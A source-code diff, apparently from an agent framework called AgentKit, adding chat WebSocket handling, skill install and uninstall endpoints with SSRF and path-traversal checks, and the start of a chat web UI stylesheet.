        raise HTTPException(status_code=404, detail=f"Agent '{session.agent_name}' not found")

    # Append user message
    await sm.append_message(
        session_id=session_id,
        role=MessageRole.USER,
        content=request.content,
    )

    # Get full conversation history for the Agent
    chat_messages = await sm.get_chat_messages(session_id)

    # Execute the Agent
    try:
        react_engine = ReActEngine(llm_gateway=req.app.state.llm_gateway)
        tools = agent._tool_registry.list_tools() if agent._tool_registry else []
        # Prefer an explicitly injected prompt, then the agent's own getter.
        system_prompt = getattr(agent, "_system_prompt", None) or (
            agent.get_system_prompt() if hasattr(agent, "get_system_prompt") else None
        )
        model = agent.get_model() if hasattr(agent, "get_model") else getattr(agent, "_llm_model", "default")
        result = await react_engine.execute(
            messages=chat_messages,
            tools=tools,
            model=model,
            agent_name=agent.name,
            system_prompt=system_prompt,
        )

        # Append assistant reply
        assistant_msg = await sm.append_message(
            session_id=session_id,
            role=MessageRole.ASSISTANT,
            content=result.output if hasattr(result, "output") else str(result),
            agent_name=agent.name,
        )
        return _message_to_response(assistant_msg)
    except Exception as e:
        # logger.exception keeps the traceback that logger.error dropped.
        logger.exception("Chat execution error for session %s", session_id)
        raise HTTPException(status_code=500, detail=str(e)) from e
@router.delete("/sessions/{session_id}")
async def close_session(session_id: str, req: Request):
    """Close a chat session."""
    closed = await _get_session_manager(req).close_session(session_id)
    # The manager returns None when the session id is unknown.
    if closed is None:
        raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
    return {"status": "closed", "session_id": session_id}
# ── WebSocket endpoint ────────────────────────────────────────────────
@router.websocket("/ws/{session_id}")
async def chat_websocket(websocket: WebSocket, session_id: str) -> None:
    """WebSocket endpoint for real-time chat with streaming.

    Client -> Server messages:
        {"type": "message", "content": "..."}                       Send a user message
        {"type": "reply", "request_id": "...", "content": "..."}    Answer an ask_human request
        {"type": "cancel"}                                          Cancel current execution
        {"type": "ping"}                                            Heartbeat

    Server -> Client messages:
        {"type": "connected", "session_id": "..."}                      Connection confirmed
        {"type": "token", "content": "..."}                             LLM token streaming
        {"type": "step", "data": {...}}                                 ReAct step event
        {"type": "ask_human", "question": "...", "request_id": "..."}   Agent asks user
        {"type": "final_answer", "content": "..."}                      Agent's final reply
        {"type": "result", "data": {"status": "cancelled"}}             Cancel acknowledged
        {"type": "error", "data": {"message": "..."}}                   Error occurred
        {"type": "pong"}                                                Heartbeat response

    Each user message is executed in a background task so that ``cancel`` and
    ``reply`` frames can still be received while the agent is running.
    Messages are processed strictly in arrival order.
    """
    import hmac  # local import: only needed for the constant-time key comparison

    # Authentication
    app_state = websocket.app.state
    configured_api_key: str | None = None
    if hasattr(app_state, "server_config") and app_state.server_config:
        configured_api_key = app_state.server_config.api_key
    if configured_api_key is None and hasattr(app_state, "api_key"):
        configured_api_key = app_state.api_key

    if configured_api_key:
        provided = websocket.query_params.get("api_key") or ""
        # Compare as bytes in constant time; compare_digest rejects non-ASCII str.
        keys_match = hmac.compare_digest(
            provided.encode("utf-8"), str(configured_api_key).encode("utf-8")
        )
        if not keys_match:
            await websocket.accept()
            await websocket.send_json({"type": "error", "data": {"message": "Invalid api_key"}})
            await websocket.close(code=4001, reason="Invalid api_key")
            return

    await websocket.accept()

    # Validate session
    sm: SessionManager = app_state.session_manager
    session = await sm.get_session(session_id)
    if session is None:
        await websocket.send_json({"type": "error", "data": {"message": f"Session '{session_id}' not found"}})
        await websocket.close(code=1000, reason="Session not found")
        return
    if session.status == SessionStatus.CLOSED:
        await websocket.send_json({"type": "error", "data": {"message": "Session is closed"}})
        await websocket.close(code=1000, reason="Session closed")
        return

    # Track pending replies for AskHumanTool
    pending_replies: dict[str, asyncio.Future] = {}
    chat_manager.add(session_id, websocket, pending_replies)

    # Unfinished message tasks and the cancellation token each one was given.
    in_flight: dict[asyncio.Task, CancellationToken] = {}
    last_task: asyncio.Task | None = None

    async def _process(content: str, token: CancellationToken, previous: asyncio.Task | None) -> None:
        """Run one user message after the previous one has finished."""
        if previous is not None:
            # Preserve arrival order without blocking the receive loop.
            await asyncio.wait([previous])
        try:
            await _handle_chat_message(websocket, session_id, content, sm, token, pending_replies)
        except WebSocketDisconnect:
            logger.debug(f"Chat WebSocket disconnected for session {session_id}")
        except Exception:
            # Nobody awaits this task's result, so log instead of losing the error.
            logger.exception("Chat message handling failed for session %s", session_id)

    try:
        await websocket.send_json({"type": "connected", "session_id": session_id})

        # Listen for client messages
        while True:
            try:
                raw = await asyncio.wait_for(websocket.receive_text(), timeout=300.0)
            except asyncio.TimeoutError:
                # Idle keep-alive.
                await websocket.send_json({"type": "pong"})
                continue

            try:
                msg = json.loads(raw)
            except json.JSONDecodeError:
                continue
            if not isinstance(msg, dict):
                # Valid JSON that is not an object carries no "type"; ignore it.
                continue

            msg_type = msg.get("type")

            if msg_type == "message":
                content = msg.get("content", "")
                # Create a fresh CancellationToken for each message
                message_token = CancellationToken()
                task = asyncio.create_task(_process(content, message_token, last_task))
                in_flight[task] = message_token
                task.add_done_callback(lambda finished: in_flight.pop(finished, None))
                last_task = task

            elif msg_type == "reply":
                # Reply to AskHumanTool
                request_id = msg.get("request_id")
                reply_content = msg.get("content", "")
                waiter = pending_replies.get(request_id) if isinstance(request_id, str) else None
                # A duplicate reply must not raise InvalidStateError.
                if waiter is not None and not waiter.done():
                    waiter.set_result(reply_content)

            elif msg_type == "cancel":
                # Cancel the tokens actually handed to the running executions.
                for token in list(in_flight.values()):
                    token.cancel()
                await websocket.send_json({"type": "result", "data": {"status": "cancelled"}})

            elif msg_type == "ping":
                await websocket.send_json({"type": "pong"})

    except WebSocketDisconnect:
        logger.debug(f"Chat WebSocket disconnected for session {session_id}")
    except Exception as e:
        logger.error(f"Chat WebSocket error for session {session_id}: {e}")
        try:
            await websocket.send_json({"type": "error", "data": {"message": str(e)}})
        except Exception:
            pass
    finally:
        # Stop any execution that is still running for this connection.
        leftover = list(in_flight.items())
        for task, token in leftover:
            token.cancel()
            task.cancel()
        # Clean up pending futures
        for fut in pending_replies.values():
            if not fut.done():
                fut.cancel()
        if leftover:
            await asyncio.gather(*(task for task, _ in leftover), return_exceptions=True)
        chat_manager.remove(session_id, websocket)
async def _handle_chat_message(
    websocket: WebSocket,
    session_id: str,
    content: str,
    sm: SessionManager,
    cancellation_token: CancellationToken,
    pending_replies: dict[str, asyncio.Future],
) -> None:
    """Process one user message: route it, run the agent, stream the events.

    The session's agent supplies the default tools, system prompt and model.
    ``resolve_skill_routing`` may replace them when the message matches a
    registered skill; in that case a ``skill_match`` frame is sent first.
    The user message is stored, the ReAct engine is streamed to the socket,
    and a non-empty final answer is stored as the assistant reply.
    Execution errors are reported to the client as an ``error`` frame.
    """
    from agentkit.chat.skill_routing import resolve_skill_routing

    app_state = websocket.app.state

    # Resolve Agent first (needed for default tools/prompt)
    pool = app_state.agent_pool
    session = await sm.get_session(session_id)
    if session is None:
        await websocket.send_json({"type": "error", "data": {"message": "Session lost"}})
        return
    agent = pool.get_agent(session.agent_name)
    if agent is None:
        await websocket.send_json({"type": "error", "data": {"message": f"Agent '{session.agent_name}' not found"}})
        return

    # Default execution parameters from agent
    if agent._tool_registry:
        default_tools = agent._tool_registry.list_tools()
    else:
        default_tools = []
    default_system_prompt = getattr(agent, "_system_prompt", None) or (
        agent.get_system_prompt() if hasattr(agent, "get_system_prompt") else None
    )
    if hasattr(agent, "get_model"):
        default_model = agent.get_model()
    else:
        default_model = getattr(agent, "_llm_model", "default")

    # Resolve skill routing using shared module
    routing = await resolve_skill_routing(
        content=content,
        skill_registry=getattr(app_state, "skill_registry", None),
        intent_router=getattr(app_state, "intent_router", None),
        default_tools=default_tools,
        default_system_prompt=default_system_prompt,
        default_model=default_model,
        default_agent_name=agent.name,
        agent_tool_registry=agent._tool_registry if agent._tool_registry else None,
        session_id=session_id,
    )

    # Notify frontend about skill match
    if routing.matched:
        match_info = {
            "skill": routing.skill_name,
            "method": routing.match_method,
            "confidence": routing.match_confidence,
        }
        await websocket.send_json({"type": "skill_match", "data": match_info})

    # Append user message (use clean_content if @skill: prefix was stripped)
    await sm.append_message(session_id=session_id, role=MessageRole.USER, content=routing.clean_content)

    # Get full conversation history
    chat_messages = await sm.get_chat_messages(session_id)

    # Execute Agent with streaming
    react_engine = ReActEngine(llm_gateway=app_state.llm_gateway)
    logger.info(f"Chat session {session_id}: executing with {len(routing.tools)} tools, model={routing.model}, skill={routing.skill_name}")

    try:
        final_content = ""
        stream = react_engine.execute_stream(
            messages=chat_messages,
            tools=routing.tools,
            model=routing.model,
            agent_name=routing.agent_name,
            system_prompt=routing.system_prompt,
            cancellation_token=cancellation_token,
        )
        async for event in stream:
            kind = event.event_type
            if kind == "final_answer":
                final_content = event.data.get("output", "")
                frame = {"type": "final_answer", "content": final_content}
            elif kind == "token":
                frame = {"type": "token", "content": event.data.get("content", "")}
            else:
                # Every other event is forwarded as a generic step.
                frame = {
                    "type": "step",
                    "data": {
                        "event_type": kind,
                        "step": event.step,
                        "data": event.data,
                    },
                }
            await websocket.send_json(frame)

        # Append assistant reply to session
        if final_content:
            await sm.append_message(
                session_id=session_id,
                role=MessageRole.ASSISTANT,
                content=final_content,
                agent_name=agent.name,
            )
    except Exception as e:
        logger.error(f"Chat execution error for session {session_id}: {e}")
        # Send only the exception text, capped at 200 characters.
        error_msg = str(e)
        if len(error_msg) > 200:
            error_msg = error_msg[:200] + "..."
        await websocket.send_json({"type": "error", "data": {"message": error_msg}})

View File

@ -1,7 +1,11 @@
"""Skill registration routes""" """Skill registration routes"""
import logging import logging
import os
import re
import urllib.parse
import httpx
from fastapi import APIRouter, HTTPException, Request from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel from pydantic import BaseModel
from typing import Any from typing import Any
@ -13,6 +17,87 @@ logger = logging.getLogger(__name__)
router = APIRouter(tags=["skills"]) router = APIRouter(tags=["skills"])
# Strict skill name validation: lowercase alphanumeric, hyphens, underscores
_SKILL_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
# Allowed domains for source URL downloads (SSRF mitigation)
_ALLOWED_DOWNLOAD_DOMAINS = {
"raw.githubusercontent.com",
"github.com",
"gist.githubusercontent.com",
}
def _validate_skill_name(name: str) -> str:
    """Return *name* stripped and lower-cased, or raise HTTP 400 if it is malformed.

    The normalized form must match ``_SKILL_NAME_RE``.
    """
    candidate = name.strip().lower()
    if _SKILL_NAME_RE.match(candidate):
        return candidate
    raise HTTPException(
        status_code=400,
        detail=f"Invalid skill name '{name}': must contain only lowercase letters, digits, hyphens, and underscores (1-64 chars)",
    )
def _get_skills_dir(req: Request) -> str:
    """Return the directory where installed skill YAML files are stored.

    The first entry of ``server_config.skill_paths`` is used when it is an
    existing directory; otherwise ``configs/skills`` under the current
    working directory is returned.
    """
    from pathlib import Path as _P

    config = getattr(req.app.state, "server_config", None)
    if config and config.skill_paths:
        # Only the first configured path is considered as install target.
        candidate = _P(config.skill_paths[0])
        if candidate.is_dir():
            return str(candidate)
    return os.path.join(os.getcwd(), "configs", "skills")
def _validate_source_url(source: str) -> None:
    """Validate that a source URL is safe to download from (SSRF mitigation).

    Checks, in order: the URL parses, the scheme is http/https, a host is
    present, and no address the host resolves to is private, loopback,
    link-local, reserved, multicast or unspecified. Hosts outside
    ``_ALLOWED_DOWNLOAD_DOMAINS`` are allowed but logged.

    Raises:
        HTTPException: 400 when any of the checks fails.
    """
    import ipaddress
    import socket
    from urllib.parse import urlparse

    try:
        parsed = urlparse(source)
        hostname = parsed.hostname
    except ValueError as exc:
        # e.g. an unterminated IPv6 literal such as "http://[::1"
        raise HTTPException(status_code=400, detail=f"Invalid source URL: {exc}") from exc

    if parsed.scheme not in ("https", "http"):
        raise HTTPException(status_code=400, detail="Invalid source URL scheme: only http/https allowed")
    if not hostname:
        # Without a host there is nothing to screen, so refuse the URL.
        raise HTTPException(status_code=400, detail="Invalid source URL: missing host")

    # Resolve hostname to check for private IPs.
    # NOTE(review): getaddrinfo blocks the event loop, and the later download
    # resolves the name again, so this check is advisory rather than airtight.
    try:
        resolved = socket.getaddrinfo(hostname, None)
    except socket.gaierror:
        resolved = []  # DNS resolution failed, let httpx handle it
    except UnicodeError as exc:
        raise HTTPException(status_code=400, detail="Invalid source URL: malformed host") from exc

    for _family, _type, _proto, _canonname, sockaddr in resolved:
        # Scoped IPv6 results look like "fe80::1%eth0"; drop the zone id.
        literal = str(sockaddr[0]).split("%", 1)[0]
        try:
            ip = ipaddress.ip_address(literal)
        except ValueError as exc:
            # Fail closed on an address that cannot be classified.
            raise HTTPException(
                status_code=400,
                detail="Source URL resolved to an unrecognized address — not allowed",
            ) from exc
        # Judge "::ffff:a.b.c.d" by the IPv4 address it wraps.
        mapped = getattr(ip, "ipv4_mapped", None)
        if mapped is not None:
            ip = mapped
        if (
            ip.is_private
            or ip.is_loopback
            or ip.is_link_local
            or ip.is_reserved
            or ip.is_multicast
            or ip.is_unspecified
        ):
            raise HTTPException(
                status_code=400,
                detail="Source URL points to a private/internal address — not allowed",
            )

    # Check domain allowlist for source URLs
    if hostname not in _ALLOWED_DOWNLOAD_DOMAINS:
        # Allow but log a warning for non-allowlisted domains
        logger.warning(f"Source URL domain '{hostname}' is not in the allowlist: {_ALLOWED_DOWNLOAD_DOMAINS}")
def _validate_yaml_content(content: str) -> dict:
    """Parse skill YAML with ``yaml.safe_load`` and return the resulting mapping.

    Raises HTTP 400 when the text is not valid YAML, is not a mapping, or has
    no ``name`` key.
    """
    import yaml

    try:
        parsed = yaml.safe_load(content)
    except yaml.YAMLError as e:
        raise HTTPException(status_code=400, detail=f"Invalid YAML content: {e}")

    problem = None
    if not isinstance(parsed, dict):
        problem = "Skill YAML must be a mapping/dict"
    elif "name" not in parsed:
        # Require at least a 'name' field
        problem = "Skill YAML must contain a 'name' field"
    if problem is not None:
        raise HTTPException(status_code=400, detail=problem)
    return parsed
class RegisterSkillRequest(BaseModel): class RegisterSkillRequest(BaseModel):
config: dict[str, Any] config: dict[str, Any]
@ -27,6 +112,11 @@ class ExecutePipelineRequest(BaseModel):
input_data: dict[str, Any] input_data: dict[str, Any]
# Request body for POST /skills/install.
class InstallSkillRequest(BaseModel):
    # Skill name; normalized and checked by _validate_skill_name before use.
    name: str
    # Optional download source. install_skill handles values starting with
    # "http" (downloaded) or "file://" (read locally); anything else, including
    # None, falls through to the GitHub search.
    # NOTE(review): a "github:user/repo/path" form is not handled specially by
    # install_skill — confirm whether it is still intended.
    source: str | None = None
@router.post("/skills", status_code=201) @router.post("/skills", status_code=201)
async def register_skill(request: RegisterSkillRequest, req: Request): async def register_skill(request: RegisterSkillRequest, req: Request):
"""Register a Skill""" """Register a Skill"""
@ -50,7 +140,7 @@ async def register_skill(request: RegisterSkillRequest, req: Request):
@router.get("/skills") @router.get("/skills")
async def list_skills(req: Request): async def list_skills(req: Request):
"""List all skills""" """List all skills with full metadata"""
skill_registry = req.app.state.skill_registry skill_registry = req.app.state.skill_registry
skills = skill_registry.list_skills() skills = skill_registry.list_skills()
return [ return [
@ -58,12 +148,182 @@ async def list_skills(req: Request):
"name": s.name, "name": s.name,
"agent_type": s.config.agent_type, "agent_type": s.config.agent_type,
"version": s.config.version, "version": s.config.version,
"description": s.config.description, "description": s.config.description or "",
"task_mode": s.config.task_mode or "",
"intent_keywords": s.config.intent.keywords if s.config.intent else [],
"intent_description": s.config.intent.description if s.config.intent else "",
"tools": s.config.tools or [],
"bound_tools": [t.name for t in (s.tools or [])],
"prompt_identity": (s.config.prompt or {}).get("identity", ""),
} }
for s in skills for s in skills
] ]
def _is_within_directory(path: str, directory: str) -> bool:
    """Return True when *path* resolves to *directory* itself or something beneath it."""
    real_dir = os.path.realpath(directory)
    real_path = os.path.realpath(path)
    try:
        # commonpath compares whole path components, so "/x/skills_evil" is
        # not mistaken for a child of "/x/skills" as a string prefix test would.
        return os.path.commonpath([real_path, real_dir]) == real_dir
    except ValueError:
        # Raised for paths on different drives (Windows).
        return False


@router.post("/skills/install")
async def install_skill(request: InstallSkillRequest, req: Request):
    """Search for and install a skill by name.

    Searches GitHub for agentkit-skill YAML files matching the name,
    downloads the first match, saves it to configs/skills/, and registers it.
    """
    # Raises HTTPException: 400 (bad name/source/YAML/path), 404 (nothing
    # found), 502 (GitHub search failed), 500 (registration failed).
    skill_name = _validate_skill_name(request.name)
    source = request.source
    skill_registry = req.app.state.skill_registry
    tool_registry = getattr(req.app.state, "tool_registry", None)

    # If source URL is provided directly, download from it
    if source and source.startswith("http"):
        _validate_source_url(source)
        try:
            # NOTE(review): redirects are followed without re-validating the
            # target, so a redirect can leave the screened host — confirm this
            # is acceptable.
            async with httpx.AsyncClient(timeout=30, follow_redirects=True, max_redirects=3) as client:
                resp = await client.get(source)
                resp.raise_for_status()
                yaml_content = resp.text
        except Exception as e:
            raise HTTPException(status_code=400, detail=f"Failed to download from source: {e}") from e
    elif source and source.startswith("file://"):
        # Read from local file path
        local_path = source[7:]  # strip "file://"
        # Check containment BEFORE existence so the endpoint cannot be used to
        # probe which files exist outside the skills directory.
        skills_dir_base = _get_skills_dir(req)
        if not _is_within_directory(local_path, skills_dir_base):
            raise HTTPException(status_code=400, detail="Local file path must be within the skills directory")
        if not os.path.exists(local_path):
            raise HTTPException(status_code=404, detail=f"Local file not found: {local_path}")
        try:
            with open(local_path, encoding="utf-8") as f:
                yaml_content = f.read()
        except Exception as e:
            raise HTTPException(status_code=400, detail=f"Failed to read local file: {e}") from e
    else:
        # Search GitHub for skills (YAML config files)
        gh_headers = {
            "Accept": "application/vnd.github.v3+json",
            "User-Agent": "agentkit",
        }
        search_query = f"{skill_name} skill config filename:yaml"
        encoded_query = urllib.parse.quote(search_query)
        github_api = f"https://api.github.com/search/code?q={encoded_query}&per_page=5"

        try:
            async with httpx.AsyncClient(timeout=15) as client:
                gh_resp = await client.get(github_api, headers=gh_headers)
                gh_data = gh_resp.json()
        except Exception as e:
            raise HTTPException(status_code=502, detail=f"GitHub search failed: {e}") from e

        items = gh_data.get("items", [])
        if not items:
            # Fallback: try a simpler search
            search_query2 = f"{skill_name} skill"
            encoded_query2 = urllib.parse.quote(search_query2)
            github_api2 = f"https://api.github.com/search/code?q={encoded_query2}+extension:yaml&per_page=5"
            try:
                async with httpx.AsyncClient(timeout=15) as client:
                    gh_resp2 = await client.get(github_api2, headers=gh_headers)
                    items = gh_resp2.json().get("items", [])
            except Exception:
                # Best effort: a failed fallback is reported as "not found" below.
                items = []

        if not items:
            raise HTTPException(status_code=404, detail=f"No skill found matching '{skill_name}'")

        # Download the first matching file
        html_url = items[0].get("html_url", "")
        if not html_url:
            raise HTTPException(status_code=404, detail="Could not construct download URL")
        # Validate the URL is from github.com before transforming
        github_prefix = "https://github.com/"
        if not html_url.startswith(github_prefix):
            raise HTTPException(status_code=400, detail="Search result URL is not from github.com")
        # Rewrite only the host prefix and the first "/blob/" segment, so a
        # repository path that itself contains "github.com" or "/blob/" survives.
        repo_path = html_url[len(github_prefix):].replace("/blob/", "/", 1)
        raw_url = "https://raw.githubusercontent.com/" + repo_path

        try:
            async with httpx.AsyncClient(timeout=30, follow_redirects=True, max_redirects=3) as client:
                resp = await client.get(raw_url)
                resp.raise_for_status()
                yaml_content = resp.text
        except Exception as e:
            raise HTTPException(status_code=400, detail=f"Failed to download skill: {e}") from e

    # Validate YAML content before writing to disk
    _validate_yaml_content(yaml_content)

    # Save to skills directory (config-driven path)
    skills_dir = _get_skills_dir(req)
    os.makedirs(skills_dir, exist_ok=True)
    file_path = os.path.join(skills_dir, f"{skill_name}.yaml")

    # Verify resolved path stays within skills_dir (path traversal protection)
    if not _is_within_directory(file_path, skills_dir):
        raise HTTPException(status_code=400, detail="Invalid path: escapes skills directory")

    # Keep the bytes of any file about to be overwritten, so a failed
    # registration does not destroy a previously installed skill.
    previous_bytes = None
    if os.path.isfile(file_path):
        with open(file_path, "rb") as existing:
            previous_bytes = existing.read()

    with open(file_path, "w", encoding="utf-8") as f:
        f.write(yaml_content)

    # Load and register the skill
    try:
        from agentkit.skills.loader import SkillLoader

        loader = SkillLoader(
            skill_registry=skill_registry,
            tool_registry=tool_registry,
        )
        loader.load_from_file(file_path)
    except Exception as e:
        logger.warning(f"Failed to register installed skill: {e}")
        # Roll back: restore the earlier file if there was one, else remove ours.
        try:
            if previous_bytes is not None:
                with open(file_path, "wb") as restored:
                    restored.write(previous_bytes)
            else:
                os.remove(file_path)
        except OSError:
            logger.warning("Failed to roll back skill file %s", file_path)
        raise HTTPException(status_code=500, detail="Skill downloaded but registration failed") from e

    return {
        "status": "installed",
        "name": skill_name,
        "path": file_path,
    }
@router.delete("/skills/{name}")
async def uninstall_skill(name: str, req: Request):
    """Unregister a skill and remove its YAML file from the skills directory.

    Args:
        name: Skill name taken from the URL path. It is passed through
            ``_validate_skill_name`` before any use.
        req: Incoming request; the skill registry is read from
            ``req.app.state.skill_registry``.

    Returns:
        ``{"status": "uninstalled", "name": <validated name>}``.

    Raises:
        HTTPException: 404 when the registry lookup for the skill fails.
    """
    # Validate name to prevent path traversal
    validated_name = _validate_skill_name(name)
    skill_registry = req.app.state.skill_registry
    try:
        skill_registry.get(validated_name)
    except Exception as exc:
        # Keep the original cause attached for debugging.
        raise HTTPException(status_code=404, detail=f"Skill '{name}' not found") from exc
    # Remove from registry
    skill_registry.unregister(validated_name)
    # Remove the YAML file (config-driven path)
    skills_dir = _get_skills_dir(req)
    yaml_path = os.path.join(skills_dir, f"{validated_name}.yaml")
    real_dir = os.path.realpath(skills_dir)
    real_path = os.path.realpath(yaml_path)
    # Compare whole path components: a plain startswith() would also accept a
    # sibling such as "<skills_dir>-other/x.yaml".
    try:
        inside_skills_dir = os.path.commonpath([real_dir, real_path]) == real_dir
    except ValueError:
        # Raised e.g. when the two paths live on different drives.
        inside_skills_dir = False
    if inside_skills_dir and os.path.exists(yaml_path):
        try:
            os.remove(yaml_path)
        except FileNotFoundError:
            # The file vanished between the check and the removal; nothing left to do.
            pass
    return {"status": "uninstalled", "name": validated_name}
# ---- Pipeline endpoints ---- # ---- Pipeline endpoints ----

View File

@ -185,7 +185,7 @@ async def _run_react_and_stream(
async for event in react_engine.execute_stream( async for event in react_engine.execute_stream(
messages=messages, messages=messages,
tools=tools, tools=tools,
model=agent._llm_model if hasattr(agent, "_llm_model") else "default", model=agent.get_model() if hasattr(agent, "get_model") else (agent._llm_model if hasattr(agent, "_llm_model") else "default"),
agent_name=agent.name, agent_name=agent.name,
system_prompt=agent._system_prompt if hasattr(agent, "_system_prompt") else None, system_prompt=agent._system_prompt if hasattr(agent, "_system_prompt") else None,
cancellation_token=cancellation_token, cancellation_token=cancellation_token,

View File

@ -0,0 +1,661 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AgentKit</title>
<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🤖</text></svg>">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,400&display=swap" rel="stylesheet">
<style>
*,*::before,*::after{box-sizing:border-box;margin:0;padding:0}
:root{
--bg:#f8f7f4;
--surface:#ffffff;
--surface2:#f1f0ec;
--surface3:#e8e7e3;
--border:#e2e0db;
--border-light:#eceae6;
--text:#1a1a1a;
--text2:#737068;
--text3:#a09d95;
--primary:#3b5bdb;
--primary-hover:#2c4ac6;
--primary-light:#eef1fd;
--primary-subtle:#d4daf9;
--user-bg:#3b5bdb;
--user-text:#ffffff;
--agent-bg:#f1f0ec;
--agent-text:#1a1a1a;
--danger:#dc2626;
--danger-light:#fef2f2;
--success:#16a34a;
--success-light:#f0fdf4;
--warning:#d97706;
--radius-sm:8px;
--radius:12px;
--radius-lg:16px;
--radius-xl:20px;
--shadow-xs:0 1px 2px rgba(0,0,0,.04);
--shadow-sm:0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04);
--shadow-md:0 4px 12px rgba(0,0,0,.07),0 1px 3px rgba(0,0,0,.05);
--shadow-lg:0 8px 24px rgba(0,0,0,.09),0 2px 6px rgba(0,0,0,.05);
--sidebar-w:280px;
--right-w:340px;
--font:'Plus Jakarta Sans',-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;
}
html,body{height:100%;font-family:var(--font);background:var(--bg);color:var(--text);overflow:hidden;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}
.app{display:flex;height:100vh}
/* ── Left Sidebar ────────────────────────────────────────────── */
.sidebar{width:var(--sidebar-w);background:var(--surface);border-right:1px solid var(--border-light);display:flex;flex-direction:column;flex-shrink:0}
.sidebar-header{padding:20px 16px 16px;display:flex;align-items:center;justify-content:space-between}
.sidebar-brand{display:flex;align-items:center;gap:10px}
.sidebar-logo{width:32px;height:32px;background:var(--primary);border-radius:var(--radius-sm);display:flex;align-items:center;justify-content:center;color:#fff;font-size:16px;font-weight:700}
.sidebar-header h1{font-size:17px;font-weight:700;letter-spacing:-0.4px;color:var(--text)}
.btn-new{background:var(--primary-light);color:var(--primary);border:none;border-radius:var(--radius-sm);padding:7px 14px;font-size:13px;font-weight:600;cursor:pointer;transition:all .2s;font-family:var(--font)}
.btn-new:hover{background:var(--primary-subtle);transform:translateY(-1px)}
.session-list{flex:1;overflow-y:auto;padding:8px 8px 16px}
.session-item{padding:10px 12px;border-radius:var(--radius-sm);cursor:pointer;transition:all .15s;margin-bottom:2px;display:flex;align-items:center;justify-content:space-between;border:1px solid transparent}
.session-item:hover{background:var(--surface2);border-color:var(--border-light)}
.session-item.active{background:var(--primary-light);border-color:var(--primary-subtle);color:var(--primary)}
.session-item.active .title{font-weight:600}
.session-item .title{font-size:13px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;flex:1;font-weight:450}
.session-item .time{font-size:11px;color:var(--text3);margin-left:8px;flex-shrink:0}
.session-item .del{opacity:0;color:var(--danger);cursor:pointer;margin-left:6px;font-size:16px;flex-shrink:0;transition:opacity .15s;width:20px;height:20px;display:flex;align-items:center;justify-content:center;border-radius:4px}
.session-item:hover .del{opacity:.6}
.session-item .del:hover{opacity:1;background:var(--danger-light)}
.empty-state{color:var(--text3);font-size:13px;text-align:center;padding:40px 16px;line-height:1.7}
/* ── Main Chat Area ──────────────────────────────────────────── */
.chat-area{flex:1;display:flex;flex-direction:column;min-width:0;background:var(--bg)}
.chat-header{padding:12px 24px;border-bottom:1px solid var(--border-light);display:flex;align-items:center;gap:12px;background:var(--surface);box-shadow:var(--shadow-xs)}
.chat-header .agent-name{font-size:15px;font-weight:600;flex:1;letter-spacing:-0.2px}
.chat-header .status{font-size:12px;color:var(--text3);display:flex;align-items:center;gap:5px}
.chat-header .status::before{content:'';width:6px;height:6px;border-radius:50%;background:var(--text3);flex-shrink:0}
.chat-header .status.connected{color:var(--success)}
.chat-header .status.connected::before{background:var(--success)}
.btn-icon{background:var(--surface);border:1px solid var(--border);color:var(--text2);border-radius:var(--radius-sm);width:36px;height:36px;display:flex;align-items:center;justify-content:center;cursor:pointer;transition:all .2s;font-size:16px}
.btn-icon:hover{background:var(--surface2);color:var(--text);border-color:var(--primary);box-shadow:var(--shadow-xs)}
/* ── Messages ────────────────────────────────────────────────── */
.messages{flex:1;overflow-y:auto;padding:24px 24px 16px;display:flex;flex-direction:column;gap:20px;scroll-behavior:smooth}
.msg{display:flex;flex-direction:column;max-width:72%;animation:msgIn .35s cubic-bezier(.16,1,.3,1)}
.msg.user{align-self:flex-end}
.msg.agent{align-self:flex-start}
.msg .bubble{padding:12px 18px;font-size:14px;line-height:1.7;white-space:pre-wrap;word-break:break-word;position:relative}
.msg.user .bubble{background:var(--user-bg);color:var(--user-text);border-radius:var(--radius-lg) var(--radius-lg) var(--radius-sm) var(--radius-lg);box-shadow:0 2px 8px rgba(59,91,219,.2)}
.msg.agent .bubble{background:var(--surface);color:var(--agent-text);border-radius:var(--radius-lg) var(--radius-lg) var(--radius-lg) var(--radius-sm);border:1px solid var(--border-light);box-shadow:var(--shadow-xs)}
.msg .meta{font-size:11px;color:var(--text3);margin-top:5px;padding:0 4px;font-weight:500}
.msg.user .meta{text-align:right}
.typing-indicator{display:inline-flex;gap:5px;padding:6px 0}
.typing-indicator span{width:7px;height:7px;background:var(--text3);border-radius:50%;animation:bounce 1.4s ease-in-out infinite}
.typing-indicator span:nth-child(2){animation-delay:.15s}
.typing-indicator span:nth-child(3){animation-delay:.3s}
/* ── Input Area ──────────────────────────────────────────────── */
.input-area{padding:16px 24px 20px;background:transparent}
.input-wrap{display:flex;gap:10px;align-items:flex-end;background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-lg);padding:6px 6px 6px 16px;box-shadow:var(--shadow-sm);transition:all .2s}
.input-wrap:focus-within{border-color:var(--primary);box-shadow:0 0 0 3px rgba(59,91,219,.1),var(--shadow-md)}
.input-wrap textarea{flex:1;background:transparent;border:none;padding:8px 0;font-size:14px;color:var(--text);resize:none;outline:none;min-height:40px;max-height:160px;font-family:var(--font);line-height:1.5}
.input-wrap textarea::placeholder{color:var(--text3)}
.btn-send{background:var(--primary);color:#fff;border:none;border-radius:var(--radius);padding:10px 20px;font-size:14px;font-weight:600;cursor:pointer;transition:all .2s;flex-shrink:0;font-family:var(--font)}
.btn-send:hover{background:var(--primary-hover);transform:translateY(-1px);box-shadow:0 2px 8px rgba(59,91,219,.3)}
.btn-send:active{transform:translateY(0)}
.btn-send:disabled{opacity:.4;cursor:not-allowed;transform:none;box-shadow:none}
/* ── Welcome ─────────────────────────────────────────────────── */
